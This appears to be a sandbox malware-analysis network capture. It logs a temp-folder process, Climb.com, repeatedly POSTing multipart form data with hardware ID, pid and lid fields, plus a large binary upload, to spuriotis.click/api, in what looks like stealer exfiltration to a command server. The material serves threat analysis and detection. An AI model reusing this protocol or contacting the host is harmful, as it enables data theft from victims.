2024-12-28 08:29:57 UTC	12791	OUT	Data Raw: 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e Data Ascii: --4940WYF3RM3Content-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--4940WYF3RM3Content-Disposition: form-data; name="pid"2--4940WYF3RM3Content-Disposition: form-data; name="lid"5FwhVM--lll--4940WYF3RM3Conten
2024-12-28 08:29:58 UTC	1124	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:29:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4csrdvj0kqrcnn6c71sf9ol5mf; expires=Wed, 23 Apr 2025 02:16:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSgf76DzvqEZdXp8JaPe8dScGT1r5jkDbXwtFJjJiw%2FaUbab6mXJZuqvbLE2XtbmrEn7XMe%2FYldb5pCJ6X683kjrbhLKiMJ7H9LHfpyXa5neS0eqCgBeMFQmfNthc6bmXDc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902f835b0c43d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1730&rtt_var=659&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13723&delivery_rate=1647855&cwnd=236&unsent_bytes=0&cid=28ac79a29fc359ab&ts=961&x=0"
2024-12-28 08:29:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:29:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49794	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:30:00 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EDJ2WBQBJ7B User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15033 Host: spuriotis.click
2024-12-28 08:30:00 UTC	15033	OUT	Data Raw: 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e Data Ascii: --EDJ2WBQBJ7BContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--EDJ2WBQBJ7BContent-Disposition: form-data; name="pid"2--EDJ2WBQBJ7BContent-Disposition: form-data; name="lid"5FwhVM--lll--EDJ2WBQBJ7BConten
2024-12-28 08:30:00 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:30:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5jqd053pvmobp9u84d791cnlgq; expires=Wed, 23 Apr 2025 02:16:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hd7GZEWYQa65F9DuuKEUQNsTnURoqI%2B5p9shrvnvP4bkgJyXkwYMLYbi%2BO%2B%2ByFNGLFnwG8aW6Alr8CN5vITeUb3CRjFFMrpZXRxjMnd6%2FE2obq1bAOsEWhe1lRJqIqK%2FbOg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902f93dc078cad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2108&min_rtt=2035&rtt_var=815&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15965&delivery_rate=1434889&cwnd=246&unsent_bytes=0&cid=f9829817c4c1b21b&ts=841&x=0"
2024-12-28 08:30:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:30:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49800	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:30:02 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FL5CLJC2ZZYV0FN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20547 Host: spuriotis.click
2024-12-28 08:30:02 UTC	15331	OUT	Data Raw: 2d 2d 46 4c 35 43 4c 4a 43 32 5a 5a 59 56 30 46 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 46 4c 35 43 4c 4a 43 32 5a 5a 59 56 30 46 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 4c 35 43 4c 4a 43 32 5a 5a 59 56 30 46 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 46 4c 35 43 4c 4a 43 Data Ascii: --FL5CLJC2ZZYV0FNContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--FL5CLJC2ZZYV0FNContent-Disposition: form-data; name="pid"3--FL5CLJC2ZZYV0FNContent-Disposition: form-data; name="lid"5FwhVM--lll--FL5CLJC
2024-12-28 08:30:02 UTC	5216	OUT	Data Raw: 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 Data Ascii: h'F3Wun 4F([:7s~X`nO`i
2024-12-28 08:30:03 UTC	1127	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3jm8e743gi1jp542nchc23u3so; expires=Wed, 23 Apr 2025 02:16:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvbfOiccKtEuUrRiqUoiadr891RG6qDqyLBLpC%2FSBn%2BM7HJM9ZuBX1LtvKsHykpIRu3TAmz8APK4WBewU%2Bg374sAPaE3vwYxicWXdwsBN1EnRPWPYv3JfIdTTyClHXGPr4c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902fa22eba8ce8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1792&rtt_var=775&sent=14&recv=27&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21505&delivery_rate=1323662&cwnd=239&unsent_bytes=0&cid=1a1e7143f663af37&ts=999&x=0"
2024-12-28 08:30:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:30:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49810	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:30:05 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PGRU0P1V1YYI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1211 Host: spuriotis.click
2024-12-28 08:30:05 UTC	1211	OUT	Data Raw: 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f Data Ascii: --PGRU0P1V1YYIContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--PGRU0P1V1YYIContent-Disposition: form-data; name="pid"1--PGRU0P1V1YYIContent-Disposition: form-data; name="lid"5FwhVM--lll--PGRU0P1V1YYICo
2024-12-28 08:30:05 UTC	1122	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:30:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hg2uk0te7vaia3lndvbqd0lr4m; expires=Wed, 23 Apr 2025 02:16:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asdUCrxzHUXBR%2B5dwshQhEQD12W8kOIFQy6fHKExNvhNYyDXTmqJczbRZ3h2cNfGTrFOxMmrNaGNLnlEp2mj0eoBEeM9j1R1irPQeIAyfwih0NVaiEC%2FjzBb61aIx00pJHA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902fb2ee5ede9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1495&rtt_var=576&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2121&delivery_rate=1953177&cwnd=209&unsent_bytes=0&cid=57f6d73e3c114d3a&ts=850&x=0"
2024-12-28 08:30:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:30:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49818	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:30:08 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LZT6ZN09IOY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 573710 Host: spuriotis.click
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e Data Ascii: --LZT6ZN09IOYContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--LZT6ZN09IOYContent-Disposition: form-data; name="pid"1--LZT6ZN09IOYContent-Disposition: form-data; name="lid"5FwhVM--lll--LZT6ZN09IOYConten
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: 0d 03 17 24 23 e2 21 d4 3d 7a ef 89 16 6b 09 26 86 85 4a 43 79 d1 14 94 7e 2d 6e d8 d9 ba 21 85 9c 29 0c 2e 2d 59 c9 84 ee d5 e4 ab b6 0d e0 61 93 a3 fa 6e 09 f5 06 17 b4 a3 4a ac 7b ac 5e 17 da e3 6b 87 64 8d 65 96 df a2 89 49 0c 83 f5 af 7b 76 3d 8b 2d dc 00 e3 60 68 ac ed 34 35 dc 33 8a 47 14 77 eb 40 32 8a 52 fc ee 23 71 7e e0 d2 23 ff 8a ec 00 c9 19 7f f6 4b ed 65 31 f0 41 b1 a1 dc a8 6e 31 f2 17 ee 8c af f9 53 f9 18 04 a4 49 93 13 bd a5 af ef 78 96 bd a5 d9 71 25 cb 87 6f 41 47 22 b6 a3 49 10 65 60 3e 54 c6 3b 9f 2f 39 2a 2d 9e 97 6c e9 0c 5d 4c 92 88 5e 4d 9d b3 9a e5 55 73 ac 5d 6c 2e 17 4a 53 9c d0 e3 e9 ff eb 22 93 97 8f 4f 98 f5 d2 84 29 5d db c5 ae f3 76 c2 81 75 1c eb 1c b9 47 15 5d 92 07 91 7b e9 93 e9 3f ea fa 0b 2a d0 d4 02 40 81 f9 2c bb Data Ascii: $#!=zk&JCy~-n!).-YanJ{^kdeI{v=-`h453Gw@2R#q~#Ke1An1SIxq%oAG"Ie`>T;/9-l]L^MUs]l.JS"O)]vuG]{?@,
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: b5 c5 8c ba cd d3 29 b4 5a f1 ab dd a1 3c 02 4e f5 fe 56 c9 85 42 04 73 68 0c 6a 1a 88 f0 7f 30 33 28 bb 9d 59 f1 7c 66 f7 58 85 c1 8c c9 86 ca 79 7a 89 80 6f fb b7 a0 28 32 c2 2f f3 3a 2a 4c 03 37 16 52 33 83 29 12 e1 fc c7 cc 44 e7 6e d1 d3 66 06 c9 2d e9 47 37 97 2b b7 29 71 84 5d 38 85 ca ca 04 7f 8f 4a 83 72 63 70 b8 00 65 40 3e 64 49 64 45 cf 50 8d f5 75 51 c2 bf 2f 3f 8c d0 c4 78 96 24 7b 0b 4a dc 37 fe 7b 84 6b 63 95 9c c0 09 f7 55 7d 23 50 66 28 c2 6f 95 5c 27 5e eb bc 25 8c 13 e1 1a 45 10 44 a5 26 0c d2 06 b6 1d 0e d5 b8 78 6c de 4f 59 58 e1 10 46 ea 58 de 73 51 69 5f 9e 1e 62 33 f6 d8 90 be a1 83 68 9b 47 d4 24 e6 96 44 83 87 ca ec de b9 21 cf 3b 75 06 ff a2 4c 8a f0 2e da 17 e5 1a 69 c6 54 5d 9e 35 41 87 c5 e2 50 86 17 fb da 86 4a 86 ce 4f 0b Data Ascii: )Z<NVBshj03(Y\|fXyzo(2/:*L7R3)Dnf-G7+)q]8Jrcpe@>dIdEPuQ/?x${J7{kcU}#Pf(o\'^%ED&xlOYXFXsQi_b3hG$D!;uL.iT]5APJO
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: 4d a8 45 90 9c ec 9a 65 90 11 d2 08 69 96 ca 4a 09 1e 2a 99 b3 16 32 d5 1b 15 cb 87 ff da e5 2d fc b0 9a be 63 f3 04 ea 24 5e 1d 7d 67 e3 0a be 19 41 83 d7 65 33 92 93 52 da 6f 5e 25 1e 1f a0 01 15 ec 33 8d 32 4d 1b 77 77 e7 5c 1d b6 eb 8d 48 0a 10 ba d8 e7 72 dc 07 42 60 3f af 46 5f dc d6 c1 40 be 15 d2 1a 59 b1 4d c2 cc c5 95 45 e8 b9 bb 62 13 53 21 ab d5 cc cf 78 9f df ca 7b 2b b6 24 e6 e7 36 cd db 09 40 e3 ca db ac ce 3c 2d 43 17 6f 3b a4 44 49 80 16 ed 3b 79 e1 62 02 61 8a 7a 81 53 fb d7 3d 1b 4d fc 67 a8 08 52 45 c9 22 a4 6d 37 f0 1a 70 7d 8a ae 93 cc 8c 15 26 2f 0b 3f d7 62 3e 8b 98 ab 44 90 14 f8 3f 8b f2 01 6f a9 eb 2b d8 fe ef 31 5d aa 99 21 63 15 99 dd 52 16 6e c0 b7 76 e7 89 a3 6e 52 2b de 1b 9d 89 29 6c aa f5 14 9c 18 fb 31 54 5e be 84 9d b6 Data Ascii: MEeiJ*2-c$^}gAe3Ro^%32Mww\HrB`?F_@YMEbS!x{+$6@<-Co;DI;ybazS=MgRE"m7p}&/?b>D?o+1]!cRnvnR+)l1T^
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: d7 28 e1 ef 91 e3 12 7f 1c 22 50 fe 06 1b cc 72 8c 4e d7 a7 07 55 5d 5a d9 85 a0 18 ad b7 68 78 f4 6b 1e c2 c4 cc 38 96 92 2a 96 95 c4 34 e0 2f 85 14 b2 cc 12 5e bd 60 4c ba 09 62 87 be be 2a e9 b5 79 14 57 ad 1b 30 74 55 2d 0f 1d a6 9a e1 ae 14 2a 0d ae e0 4c 06 fd fc 11 e7 f1 56 cd cf 37 3b dc 64 0b 25 15 f2 e6 94 db 3b d6 3f e5 92 cc 36 3d 40 0b 4a e6 01 50 ab 1b c5 2a 9e a3 56 cc 6f 4c 0a 57 bd b7 18 fc a3 64 3f 50 29 79 cf c6 1f c3 28 dd d2 ee 36 ce a1 ab 5d 7d d1 10 e4 b7 3f 01 1d 2d f4 3f 53 e1 ff bd 64 2a 83 6c 78 34 49 96 14 6d c2 dc 5e 41 70 46 0b 4e dc 5a 7a 42 5a 77 22 de 50 23 2a 4f e1 b6 e6 27 32 3b 26 83 94 09 6f 2a ed ae b8 b2 c6 46 d3 7d f7 f8 41 5d 63 79 e5 3c 33 d0 6c 00 03 97 df d3 96 96 19 e9 ed 58 1f ac c0 c5 07 8b 3c 16 6a 29 97 6e Data Ascii: ("PrNU]Zhxk84/^`LbyW0tU-LV7;d%;?6=@JPVoLWd?P)y(6]}?-?Sdlx4Im^ApFNZzBZw"P#O'2;&o*F}A]cy<3lX<j)n
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: 15 40 cc c5 be ce e0 a3 76 06 a7 e9 80 0f 26 f5 ab 46 59 3c d8 ce 42 45 d8 30 37 c3 0a b8 9e ba df 5b 72 9e 6a 61 98 89 8c 10 59 8f 0f 5b 14 e7 5f 51 ae 94 ef f9 74 f9 67 d8 cf 27 1a 88 12 a4 4d 03 6e 3c a3 1c 72 db 41 65 66 44 e0 f5 51 f1 12 5d 0b a2 77 61 13 55 dc 62 61 30 be 7a 31 10 36 cb 7d 78 b8 5f f5 e7 44 5f d6 ec 9b 97 23 c2 6e 72 e3 d2 8b d6 c7 1e 8e 3b f2 ae 34 1f 1b 9b 2d c8 4e d6 97 89 0f 39 c0 12 b9 c5 90 fb 21 e9 4d bf 8c 7d 57 87 f8 40 3d 1e 1b 37 66 ac 14 5b 0e cb 73 4b 5c 4e 5c 6e 17 89 c8 a5 ab aa ca 9c 4b 9a 71 6e 10 7d 20 47 74 e5 ca 8c c0 eb 1d 56 07 b2 e7 37 7d 64 1d ff c0 9a 7c 7f d5 5e e6 83 4d 5c 9b ac ba 4a 8c 39 34 26 56 90 56 d3 3c 52 22 2d 26 e0 94 7f f8 8c dc ca 12 d9 64 dc b7 bf f2 28 cf 19 31 f9 3e b3 e3 1d ab 76 20 48 9d Data Ascii: @v&FY<BE07[rjaY[_Qtg'Mn<rAefDQ]waUba0z16}x_D_#nr;4-N9!M}W@=7f[sK\N\nKqn} GtV7}d\|^M\J94&VV<R"-&d(1>v H
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: c1 a6 c5 5f 5f fe d2 25 17 4a 81 d1 8b a0 4c 02 9b 27 8a cb e3 be 13 ba 35 fb 63 ac 90 9b ef ab 2d 85 e0 24 a3 95 3a 4f b9 7c f5 64 45 7e 6d b6 3c 76 a0 21 78 21 b2 e1 d6 65 91 43 67 0e d4 96 17 b8 97 56 f6 ba 9d b9 85 d2 21 6a 69 3e d1 41 bb f1 24 04 0a ec 87 a1 1b 77 ac cf 3a 44 58 9e d0 5d b6 91 10 35 f8 fd 1b d5 97 fc da 17 2e fa f6 b8 d3 7f 0f 2b 9f 87 2b 62 07 93 45 1e 29 a8 23 8e 56 7c f6 5e d8 d4 37 ef d5 dd d4 a9 9a 16 fa d1 eb 39 36 77 c9 e2 f2 e3 2c 07 e3 9a b3 4f 79 10 5e 3f 5f ce f4 1d eb 95 57 b3 a9 b9 59 81 8a f8 70 6d ed 52 55 50 b2 b5 76 cf cf 91 67 47 f0 61 df 5c 5d ac 67 45 70 57 48 eb b7 ac df 8f 0c 58 56 a8 15 25 77 d1 be fa 7b 95 e6 4a 8b f7 16 a8 5c 61 a2 56 36 5e 2c 48 e7 ed 32 35 ef bf bf 9f 00 b8 ec 2e f2 58 16 a1 b1 bf d3 f2 48 Data Ascii: __%JL'5c-$:O\|dE~m<v!x!eCgV!ji>A$w:DX]5.++bE)#V\|^796w,Oy^?_WYpmRUPvgGa\]gEpWHXV%w{J\aV6^,H25.XH
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: 66 f2 f3 97 96 d6 b4 07 08 3a 62 1e dd 1c 14 3e 24 eb 73 f3 13 c2 58 9c c9 72 39 45 37 c7 c9 d6 b7 d4 c2 6c 7a 41 41 f4 be d0 e0 d5 55 96 2a 5d f9 7a 85 bd 62 0c 9a 78 92 24 40 8f 1f 9c 72 9f ee 92 85 56 db 6a bf 8f 32 1a 96 c1 11 9a f3 ea db e2 be 74 2b c5 6f e6 f2 f2 64 3b aa 7d f7 58 4d a8 8b 52 b0 db 77 91 74 bc 80 45 bb 58 e5 39 df 2b c0 ae 46 d7 74 24 c7 ea 7e 1f 4d 83 e2 0e 34 78 69 b9 3b 71 41 64 bb f5 0d 10 0e 62 bd fa 26 28 b3 bb 05 f5 d1 d6 e9 85 c8 47 df 2a 6e f8 46 14 f6 08 b2 e2 f8 86 e5 ff 64 a4 5b dd f6 b2 11 32 00 c5 e1 8b cd 53 77 5c f5 81 e7 11 96 a0 c1 72 28 8f fb cd bf 06 e6 79 35 6e 29 1f c1 f1 33 3f 44 b8 ca 88 69 e6 39 ff 59 2d 9e 71 d3 d2 98 c1 67 9e 71 db 28 13 30 07 28 c4 f2 4e d5 05 97 0e a8 ec b9 09 78 cd 31 91 a2 d4 d4 19 29 Data Ascii: f:b>$sXr9E7lzAAU]zbx$@rVj2t+od;}XMRwtEX9+Ft$~M4xi;qAdb&(GnFd[2Sw\r(y5n)3?Di9Y-qgq(0(Nx1)
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: ff 6b db 2f 15 31 5f 7e 7f 70 15 b1 e8 e4 79 1c 9b bc d4 9d da 89 80 26 c4 5c ca aa 5f e0 77 b7 2a 44 1a 1a 69 67 ca b1 8e a5 29 4b 5f e0 d7 fc 35 fd 61 57 19 12 42 e4 e8 ce 0f 3b fa 7f 57 d0 67 de df c3 59 7a 29 21 0b af 0b 05 60 da 7d ea 27 e3 ca 7f fe d4 35 88 a4 90 e2 27 b8 d9 1c 18 f1 92 7d 4a c6 a3 0a 6a e0 5e 10 cd 53 b1 56 3f 4c c4 6e 04 8b 48 f7 f8 c1 ad e9 c1 1d 84 b3 d5 56 c6 d2 02 66 e4 67 82 da 05 94 21 da 09 54 4f 24 dd 01 95 e6 cf c5 cf a0 fb a2 00 5b 9c fb 5d 46 3a b0 27 fc 78 62 db 80 5c ae b6 e8 5c 4e d1 73 b4 ea be 33 f2 0e 44 63 43 de f8 7a 4e f0 b7 50 01 04 3f 30 60 26 03 3b e7 88 0f ca fa 3f 05 36 c7 1b 67 06 